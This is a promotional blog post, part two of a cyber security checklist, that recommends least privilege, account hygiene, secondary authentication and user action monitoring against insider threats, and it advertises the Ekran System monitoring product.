In this post we continue our article on how to create your cyber security checklist. In the first part we took an in-debt look at what it takes to formulate your cyber security strategy and create an effective checklist and looked at 5 steps that you can take to protect your data from a wide variety of threats, both outside and inside the organization.
In this part, we will focus much more on the measures that are not as obvious, and not every company puts these measure in place. Most of them are concentrated on combating a rarely spoken about but potentially very damaging insider attacks.
Many companies think that malicious insiders target only large organizations, underestimating the risk from within to their own data. However, the truth is, every company is vulnerable to malicious insiders and failure to address this threat undermines your security from outsider attacks (for example, it leaves you open to a perpetrator using a compromised account).
So without further ado, let’s look at a 3 key steps you can include in your cyber security checklist to up the protection of your sensitive data, particularly from malicious insiders.
- Use the principle of least privilege. When assigning privileges for user accounts, it is important to always grant each new user the least amount of privileges possible by default. Privilege level can then be escalated, if user requires access to more sensitive data. Using this principle is the simplest way to limit the number of privileged accounts in your company and make sure that only accounts that actually need access to sensitive data have it.
- Create a procedure for granting and terminating privileges. It is also necessary to make sure that privileges can be granted or terminated as needed. A common situation is when users need privileged access temporary. Such access is often granted and then not revoked, leaving user capable to access sensitive data even if they don’t need it. It is unsecure not only from insider threat standpoint, but also in case this account gets compromised from the outside.
- Make sure to disable access of terminated employees. Malicious actions are often conducted by disgruntled employees that retained their privilege access after termination. In many cases employees feel that they have been terminated unjustly and if you don’t disable their user accounts, they may use it to harm your company or steal sensitive data. A procedure to properly terminate unused accounts should be put in place in order to avoid this.
- Use ways to temporary elevate privilege. A good way to manage privileges is to temporary grant them when necessary and revoke as soon as they are no longer needed. However, doing this manually can be very hard, particularly in large companies. A better way is to use some kind of automatic system, such as one-time password solution to grant a secure temporary access to sensitive data on a per-session basis. This will allow to manage user privileges efficiently and make sure that there are no accounts with unnecessarily high level of privilege.
- Issue strong unique passwords to each employee. Thorough account protection starts with a unique and reliable password. It is important to not reuse this password for any other accounts, personal ones in particular, and to make sure that it is sufficiently complex as to not be cracked by a brute force.
- Prohibit password sharing. It is important to make sure that each account has its own unique password and that your employees are prohibited from using the same password between each other.
- Prohibit account sharing. Sometimes different users may use a single account. This is particularly common for sysadmins – they will often share a single admin or root account between several of them. Such cases of account sharing should be limited as much as possible. It is also should be prohibited for employees to give their credentials to each other. Sometimes sharing credentials can make employees job faster or more efficient, however, it also severely compromises security of their accounts. In order to combat this, employee cyber security awareness training is needed.
- Use secondary authentication. One great way to up the security of your accounts, deal with shared accounts and at the same time, control who exactly accesses your sensitive data is to use a secondary authentication solution. There are many ways in which secondary authentication can be implemented. It can be done by using a special physical security tokens, or, in case of a distributed workforce, by using mobile devices.
User action monitoring
- Monitor privileged user actions. User action monitoring is your main tool when it comes to detecting any data theft and misuse, either from malicious insiders or compromised accounts. The most attention should be paid to actions of the users with the most access and highest level of privilege. Privilege users are usually the most trusted ones in and organization, however, they are also the ones who can easily steal sensitive data without anyone noticing. Since it’s hard to distinguish malicious actions from their regular routine, user action monitoring becomes the only tool, that allows to effectively detect malicious insiders among privileged users.
- Monitor remote users and third parties. Most companies have a lot of remote workers, subcontractors and partners, all of whom are accessing your sensitive information remotely. However, despite the fact that security is fully up to the standard on your end, it may not be the case on their. Monitoring remote user actions when they work with your network is the best way to detect malicious or inadvertent insiders.
- Make sure each user is clearly identified. One of the big challenges of user action monitoring is the necessity to deal with shared accounts. Each user session needs to be clearly associated with the user that initiated it. This is why it is important to use an action monitoring solution that includes some way to identify users of shared accounts.
- Make sure monitoring cannot be disabled or tampered with. Technically savvy users can easily disable monitoring process or alter data in order to cover their tracks. To avoid this, it is necessary to employ a user action monitoring solution that would be impossible to disable and that would keep monitoring regardless of user privilege or any actions said user took. One example of such solution is Ekran System, a user action monitoring tool that protects its monitoring agent with a special driver, that can’t be disabled by a user on a monitored endpoint.
Ekran System – user action monitoring solution for your cyber security
As effective as user action monitoring really is, many companies often exclude it from their own cyber security checklists. There are several reasons for this. First of all, they may underestimate the dangers of insider threats, thus not seeing value in being able to prevent and detect them.
However, with the latest high profile cases of data breaches by malicious insiders on the news (cases like Edward Snowden NSA leaks), many companies now understand that malicious insiders can do a lot of damage, which prompts them to rethink their approach to this threat.
But even when company wants to put measures against insider threats in place, they often find most user action monitoring solutions on the market to be too expensive. The truth is, most of them are designed with large enterprises in mind, and use pricing models that make smaller deployment inefficient.
Ekran System is a user action monitoring solution, designed for both large companies and SMBs. It features flexible pricing model where Standard license only charges based on a type and number of monitored endpoints, making small deployments very cost-effective, while large enterprises can purchase additional Enterprise license to get a set of additional features designed for large companies specifically.
Main features of Ekran System include:
- Robust recording capabilities – Ekran System records everything user sees on their screen, including mouse movements, as well as additional metadata, such as keystrokes, names of opened applications, visited URLs, entered commands during SSH/Telnet sessions, etc. All of this data is stored into specially created indexed video format, optimized to minimize bandwidth and storage requirements. Videos can be viewed in a convenient video player, giving you full insight into user actions during each particular session.
- Additional authentication and one-time passwords – Ekran System uses additional authentication as a way to distinguish between users of shared accounts. Each user is assigned additional unique set of credentials that they should enter during login procedure. Moreover, Enterprise license contains additional one-time password feature, designed to allow enterprises an easy and secure way to give temporary access to protected server for anybody that may need it.
- Customizable and pre-defined alerts – Ekran System provides a set of pre-defined alerts, designed to incorporate the most common set of suspicious incidents that most companies will face. However, it is also possible to fully customize alerts in order to cater them to the needs of your company.
- Live session viewing and blocking – Upon receiving a notification about an alert, security personnel can than view the session in question live (if it is still ongoing), and make the decision to block it, if necessary. This allows you to start investigating incidents while they are still happening and take measures to limit or even possibly prevent potential damage.
- USB device blocking – Ekran System can detect and optionally automatically block any USB devices, connected to a monitored endpoint. USB mass storages are often used as a means to steal sensitive data, and with Ekran System, it is easy to prevent their use.
- Easy setup and reliability – Ekran System is easy to set up and use. As it is agent-based solution, it’s deployment does not require you to make any changes to your existing network infrastructure (although, Ekran System can easily be installed on a jump or bastion-type server). It has low system requirements and does not cause any noticeable impact on performance. Upon installing new version, all agents are updated automatically, guaranteeing a no-hassle maintenance.
All and all, Ekran System is a great user action monitoring tool that allows not only large companies, but even small and medium sized organizations to build their own insider threat protection, thus greatly strengthening their own overall cyber security posture.
We hope that the list of measures and best practices presented in this two-part article will give you some ideas on how to build your own cyber security checklist. Cyber security implementation is a continuous process, as the threats we face evolve on a daily basis, so evolve our ways to fight them, and this evolution should be reflected in a cyber security strategy of your company.
Regular and thorough risk assessments are key in keeping up to date with the latest threats and security practices, designed to combat them. However, as it is often the case, ability to improve something later requires to have a solid foundation to begin with. Your cyber security strategy today will become a groundwork for the security of your data tomorrow, so it is necessary to get that security strategy right.